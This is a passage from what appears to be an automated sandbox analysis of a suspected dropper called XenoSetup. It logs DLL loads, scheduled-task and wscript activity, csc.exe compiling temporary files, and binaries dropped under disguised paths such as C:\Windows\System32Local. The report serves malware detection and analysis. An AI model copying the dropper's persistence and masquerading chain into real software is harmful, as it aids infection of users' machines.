                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: dlnashext.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: wpdshext.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: slc.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: dxgidebug.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: sfc_os.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: dwmapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: riched20.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: usp10.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: msls31.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: iconcodecservice.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: textinputframework.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: coreuicomponents.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: coremessaging.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: coremessaging.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: policymanager.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: msvcp110_win.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: pcacli.dll
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: apphelp.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: version.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: version.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: ktmw32.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: rtutils.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                      Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                      Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                      Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                      Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                      Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: mscoree.dll
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: kernel.appcore.dll
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: version.dll
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: uxtheme.dll
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: XenoSetup(2).exe.bin.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: XenoSetup(2).exe.bin.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: XenoSetup(2).exe.bin.exeStatic file information: File size 16777216 > 1048576
                      Source: XenoSetup(2).exe.bin.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x377e00
                      Source: XenoSetup(2).exe.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: XenoSetup(1).exe, 00000006.00000000.2342774589.0000000001013000.00000002.00000001.01000000.00000008.sdmp, XenoSetup(1).exe, 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmp, XenoSetup(1).exe, 0000000A.00000000.2466239028.0000000001013000.00000002.00000001.01000000.00000008.sdmp, XenoSetup(1).exe, 0000000A.00000002.2471884148.0000000001013000.00000002.00000001.01000000.00000008.sdmp, XenoSetup(1).exe, 00000010.00000000.2546623626.0000000001013000.00000002.00000001.01000000.00000008.sdmp, XenoSetup(1).exe, 00000010.00000002.2557207188.0000000001013000.00000002.00000001.01000000.00000008.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\apphost\standalone\apphost.pdb source: XenoSetup(2).exe.bin.exe, 00000000.00000002.2351062899.0000000013118000.00000004.00000800.00020000.00000000.sdmp, Xeno.exe, 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe, 00000007.00000000.2346195211.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.dr
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\win-x64.Release\corehost\apphost\standalone\apphost.pdbmmmGCTL source: XenoSetup(2).exe.bin.exe, 00000000.00000002.2351062899.0000000013118000.00000004.00000800.00020000.00000000.sdmp, Xeno.exe, 00000007.00000002.2347103928.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe, 00000007.00000000.2346195211.00007FF68D5F7000.00000002.00000001.01000000.0000000C.sdmp, Xeno.exe.0.dr
                      Source: Binary string: :C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.pdb source: DriverbrokerCrtDhcp.exe, 0000000F.00000002.2614383280.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: :C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.pdb source: DriverbrokerCrtDhcp.exe, 0000000F.00000002.2614383280.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: :C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.pdb source: DriverbrokerCrtDhcp.exe, 0000000F.00000002.2614383280.0000000003924000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline"
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.cmdline"
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.cmdline"
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\w5cymjn5\w5cymjn5.cmdline"Jump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xze5z45r\xze5z45r.cmdline"Jump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3tshlj5d\3tshlj5d.cmdline"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Xeno.exeCode function: 7_2_00007FF68D5ECB70 LoadLibraryA,GetProcAddress,_invalid_parameter_noinfo_noreturn,7_2_00007FF68D5ECB70
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeFile created: C:\portBrokerDll\__tmp_rar_sfx_access_check_6546781Jump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeCode function: 0_2_00007FFD348B00BD pushad ; iretd 0_2_00007FFD348B00C1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3477D2A5 pushad ; iretd 2_2_00007FFD3477D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34962316 push 8B485F94h; iretd 2_2_00007FFD3496231B
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FFF640 push ecx; ret 6_2_00FFF653
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeCode function: 6_2_00FFEB78 push eax; ret 6_2_00FFEB96
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 15_2_00007FFD34893884 push ds; iretd 15_2_00007FFD34893887
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeCode function: 15_2_00007FFD34896BD4 push cs; iretd 15_2_00007FFD34896BD5
